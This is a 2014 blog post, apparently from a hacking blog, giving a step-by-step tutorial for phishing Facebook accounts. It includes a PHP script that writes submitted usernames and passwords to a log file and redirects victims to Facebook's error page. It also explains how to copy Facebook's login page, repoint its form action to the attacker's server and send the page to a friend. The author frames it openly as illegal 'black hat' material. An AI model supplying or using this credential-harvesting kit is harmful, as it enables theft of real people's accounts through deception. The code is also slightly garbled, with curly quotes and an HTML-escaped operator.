News Ticker

Hacking Facebook Account : Working of Phishing to Hack Facebook Account

By Unknown - Sunday 16 February 2014 No Comments
friends, on your huge request of posting black hat hacking stuff, i decided to share all possible black hat (illegal) stuff with you in a white hat manner.
as i am too serious about my security :) from get caught in illegal activity.
as i already told i am starting these articles from basic stuff so that it will help a newbie to a professional.
In this article i will explain how hackers hack Facebook accounts by using a basic technique called phishing.
before i start some codding, i want to explain you the login procedure of Facebook account.
when user visit to Facebook index page, there user found a Login Form,

when user enters login info (Username, And Password).
and clicks on LogIn Button to submit these info,
Browser sends these information to Facebook Server URl (which is written on action="https://.............attempt=1") for verification.
and for wrong combination of Username and Password, returns an error Page(url).
 Now you know the internal working of login,
now the Hacking of Facebook Login starts here..
1. we have to save these combination (Username And Password) on our place.
we can achieve this by replacing action="FACEBOOK URL TO OUR URL".
Now we have to create a page and host on some server to operate (save) these login info.
2. Write some PHP code that can save these info to a file, send to email or database (more secure and complex).
as a starter you can save these info to a file on server, (Later i will explain how you can forward these info to your own email id)
3. PHP Code to save all login info to a file (log.txt)
<?php
Header(“Location: https://www.facebook.com/login.php?login_attempt=1");
// To Redirect to Facebook Error Page
$handle = fopen(“log.txt”, “a”);  //Open File to append
          Foreach($_GET as $variable =&gt; $value) //loop for all input variable
{
          fwrite($handle, $variable);
          fwrite($handle, “=”);
          fwrite($handle, $value);
          fwrite($handle, “\r\n”);
          }
          Fwrite($handle, “\r\n”);   //Saving to file
          fclose($handle);  //Closing file after save
          exit;
?>
4. Now you have all working and knowledge of Phishing, now how to do this.
5. Create 2 files, i log.txt // blank to save login info
ii. login.php // write above written code in this file as it.
6. Upload these two files on any server, note url of login.php,
like "http://xyz.ab.com/login.php"
7. Open Browser and goto Facebook Website having no login, where only login page exist, and press CTR + S // to save facebook login page.
and after saving the page right click on html file and open with notepad,
Press CTR+F to find Action="" // explain earlier in pic.
and replace whole url with above url of login.php
8. Now you can directly send this html file to a friend and write something so that user must open and login to that page or
you can use an effective way by uploading this page on server and send url of this facebook page to friend.

hope you understand the whole procedure..
if any problem occurs just comment below i will try my best to solve.
in next tutorial i will try to post an video tutorial of above.
Good Bye.
Have a happy Hacking,
your friend,Unknowndevice64.

No Comment to " Hacking Facebook Account : Working of Phishing to Hack Facebook Account "